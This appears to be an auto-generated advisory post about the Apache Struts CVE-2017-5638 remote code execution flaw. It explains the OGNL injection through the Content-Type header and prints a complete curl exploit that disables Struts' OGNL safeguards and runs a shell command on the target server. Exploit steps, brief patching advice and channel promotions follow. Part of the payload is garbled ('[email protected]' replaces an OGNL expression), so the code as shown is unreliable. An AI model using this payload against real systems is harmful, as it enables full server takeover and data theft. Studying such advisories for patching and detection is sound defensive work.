Apache Struts, Remote Code Execution, CVE-2017-5638 (Critical)

By /

Listen to this Post

The CVE-2017-5638 vulnerability in Apache Struts 2 stems from flawed error handling within the Jakarta Multipart parser. When a malicious Content-Type header is sent in an HTTP request to a Struts2-based application, the parser attempts to generate an error message. This message is constructed using user-supplied data from the Content-Type header without proper sanitization. The unsanitized input is then incorrectly evaluated as an Object-Graph Navigation Language (OGNL) expression. OGNL is a powerful expression language that allows for method execution and access to underlying Java runtime. Consequently, an attacker can craft a request with a Content-Type header containing a malicious OGNL expression. When processed, the Struts framework executes this expression in the context of the server application, leading to arbitrary remote code execution with the privileges of the application server.
Platform: Apache Struts
Version: 2.3.5 – 2.3.31, 2.5 – 2.5.10

Vulnerability : Remote Code Execution

Severity: Critical

date: 2017-03-07

Prediction: Patch Available

What Undercode Say:

curl -H "Content-Type: %{(_='multipart/form-data').([email protected]@DEFAULT_MEMBER_ACCESS).(_memberAccess?(_memberAccess=dm):((container=context['com.opensymphony.xwork2.ActionContext.container']).(ognlUtil=container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(ognlUtil.getExcludedPackageNames().clear()).(ognlUtil.getExcludedClasses().clear()).(context.setMemberAccess(dm)))).(cmd='whoami').(iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(cmds=(iswin?{'cmd.exe','/c',cmd}:{'/bin/bash','-c',cmd})).(p=new java.lang.ProcessBuilder(cmds)).(p.redirectErrorStream(true)).(process=p.start()).(ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(process.getInputStream(),ros)).(ros.flush())}" http://target.com/struts2-endpoint

How Exploit:

Craft malicious HTTP request.

Set malicious OGNL in Content-Type.

Trigger parser error.

Execute arbitrary commands.

Protection from this CVE

Upgrade Struts immediately.

Apply official patch.

Use input validation filters.

Disable unused Struts features.

Impact:

Full server compromise.

Data breach.

Complete system control.

Service disruption.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top